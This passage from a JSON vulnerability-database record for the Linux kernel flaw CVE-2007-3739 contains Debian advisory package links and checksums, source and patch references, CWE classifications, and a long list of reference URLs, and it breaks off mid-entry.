http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-4-s390_2.6.8-6sarge1_s390.deb\n    Size/MD5 checksum:  2992448 d90f45f8f995286690ed2c460f5f418b\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-headers-2.6.8-4_2.6.8-6sarge1_s390.deb\n    Size/MD5 checksum:  5092100 c603b5b67a2e4be7b92fc909a64493cd\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-4-s390-tape_2.6.8-6sarge1_s390.deb\n    Size/MD5 checksum:  1150168 8cf8f4a0193c71df9a27b3362b868cc5\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-4-sparc64-smp_2.6.8-16sarge1_sparc.deb\n    Size/MD5 checksum:  7645904 2c30dc864de96d05d0a3426b36c26d3a\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4_2.6.8-16sarge1_sparc.deb\n    Size/MD5 checksum:  2896286 54cdf0c85119d5a049164705e54a24d9\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-4-sparc32_2.6.8-16sarge1_sparc.deb\n    Size/MD5 checksum:  4563634 2df1caceab9295aca03f8efb9abfa33a\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-4-sparc64_2.6.8-16sarge1_sparc.deb\n    Size/MD5 checksum:  7449244 1833928627fd502581b283c8d508b423\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4-sparc32_2.6.8-16sarge1_sparc.deb\n    Size/MD5 checksum:   116254 ccfa57772f57fc041c7e2f52fc09216c\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4-sparc64-smp_2.6.8-16sarge1_sparc.deb\n    Size/MD5 checksum:   151548 0170da5a8e3a7179073a6ee42fe41b27\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-build-2.6.8-4_2.6.8-16sarge1_sparc.deb\n    Size/MD5 checksum:    10856 5866644f6a69cd14120b2f27b936097e\n  http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4-sparc64_2.6.8-16sarge1_sparc.deb\n    Size/MD5 checksum:   150948 ed82830f3020847472660683d0a8b5cd\n\n  These files will probably be moved into the oldstable distribution on\n  its next update. \n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show \u003cpkg\u003e\u0027 and http://packages.debian.org/\u003cpkg\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (GNU/Linux)\n\niD8DBQFHvz3RhuANDBmkLRkRApVbAJ9d6wqvYEi8ewaJll1OtoMK1n945QCeLY4u\nNcwTnhEcZs8czVzN6M2RXoE=\n=69WA\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-3739"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      },
      {
        "db": "VULHUB",
        "id": "VHN-27101"
      },
      {
        "db": "PACKETSTORM",
        "id": "59589"
      },
      {
        "db": "PACKETSTORM",
        "id": "59655"
      },
      {
        "db": "PACKETSTORM",
        "id": "63957"
      },
      {
        "db": "PACKETSTORM",
        "id": "59688"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-3739",
        "trust": 2.9
      },
      {
        "db": "SECUNIA",
        "id": "26760",
        "trust": 2.5
      },
      {
        "db": "SECUNIA",
        "id": "26955",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "27913",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "27436",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "29058",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "27747",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "23955",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "26978",
        "trust": 1.7
      },
      {
        "db": "XF",
        "id": "36592",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000687",
        "trust": 0.8
      },
      {
        "db": "MLIST",
        "id": "[LKML] 20070129 [PATCH] DON\u0027T ALLOW THE STACK TO GROW INTO HUGETLB RESERVED REGIONS",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2007:0939",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2007:0705",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2007:1049",
        "trust": 0.6
      },
      {
        "db": "UBUNTU",
        "id": "USN-518-1",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1378",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1504",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200709-179",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-27101",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "59589",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "59655",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "63957",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "59688",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27101"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      },
      {
        "db": "PACKETSTORM",
        "id": "59589"
      },
      {
        "db": "PACKETSTORM",
        "id": "59655"
      },
      {
        "db": "PACKETSTORM",
        "id": "63957"
      },
      {
        "db": "PACKETSTORM",
        "id": "59688"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200709-179"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3739"
      }
    ]
  },
  "id": "VAR-200709-0497",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27101"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T19:27:58.514000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-8.12AX",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=58"
      },
      {
        "title": "ChangeLog-2.6.20",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.20"
      },
      {
        "title": "kernel (V3.0)",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/update/linux/list.php?errata_id=1214"
      },
      {
        "title": "RHSA-2007:0705",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2007-0705.html"
      },
      {
        "title": "RHSA-2007:0939",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2007-0939.html"
      },
      {
        "title": "RHSA-2007:1049",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2007-1049.html"
      },
      {
        "title": "RHSA-2007:1049",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2007-1049j.html"
      },
      {
        "title": "RHSA-2007:0705",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2007-0705j.html"
      },
      {
        "title": "RHSA-2007:0939",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2007-0939j.html"
      },
      {
        "title": "TLSA-2008-4",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2008/tlsa-2008-4j.txt"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.9
      },
      {
        "problemtype": "CWE-399",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27101"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3739"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://secunia.com/advisories/26760"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/23955"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/26955"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/26978"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/27436"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/27747"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/27913"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/29058"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2007/dsa-1378"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2008/dsa-1504"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2007-0705.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2007-0939.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2007-1049.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-518-1"
      },
      {
        "trust": 1.7,
        "url": "http://lkml.org/lkml/2007/1/29/180"
      },
      {
        "trust": 1.7,
        "url": "http://support.avaya.com/elmodocs2/security/asa-2007-474.htm"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=253313"
      },
      {
        "trust": 1.4,
        "url": "http://xforce.iss.net/xforce/xfdb/36592"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36592"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11455"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3739"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-3739"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3739"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3740"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4573"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3731"
      },
      {
        "trust": 0.3,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.3,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.3,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.3,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mips_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390x_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390-tape_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-i386_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-hppa_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-powerpc_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch3.dsc"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-sparc_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-alpha_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-prep_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_ia64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch3_ia64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-itanium_2.6.18.dfsg.1-13etch3_ia64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-13etch3_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_mips.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-ia64_2.6.18.dfsg.1-13etch3_ia64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.13etch3.dsc"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-s390_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch3_hppa.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390x_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch3_alpha.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch3_s390.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-13etch3_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_ia64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch3_mipsel.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch3_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch3_powerpc.deb"
      },
      {
        "trust": 0.2,
